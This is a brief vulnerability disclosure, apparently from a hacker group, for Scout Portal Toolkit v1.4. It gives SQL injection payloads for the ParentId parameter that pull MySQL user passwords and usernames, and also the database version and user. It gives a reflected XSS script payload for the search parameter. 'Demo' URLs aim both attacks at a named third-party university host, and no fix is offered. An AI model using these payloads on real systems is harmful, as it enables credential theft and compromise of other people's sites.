.-----------------------------------------------------------------------------------------------

.The Scout Portal Toolkit V1.4 - xss/sql injection Vulnerability
.
.-------------------------------------------------------------------------------------
.(BrowseResources.php?ParentId=) SQL Injection
.
.(QuickSearch.php?ss=) Cross Site Scripting - XSS
.
.Project: - http://scout.wisc.edu/Projects/SPT/
.-------------------------------------------------------------------------------------
.Bug founded by d3v1l [Avram Marius] - d3v1l@spoofer.com
.
.gR33TZ to all Security-Sh3ll staff/members
.-------------------------------------------------------------------------------------
.Poc-Exploit: -
.
.
.-1 UNION SELECT concat(password,char(58),user) FROM mysql.user LIMIT 1,1/*
.
.-1 UNION SELECT concat_ws(0x3a,version(),database(),user()) LIMIT 1,1/*
.-------------------------------------------------------------------------------------
.Demo: -
.
.
.
http://walton.rockcluster.brown.edu/SPT/SPT--BrowseResources.php?ParentId=SQL
--------------------------------------------------------------------------------------
.XSS:-
.
.http://walton.rockcluster.brown.edu/SPT/SPT--QuickSearch.php?ss=
"><script>alert(/XSS/)</script>
.------------------------------------------------------------------------------------------------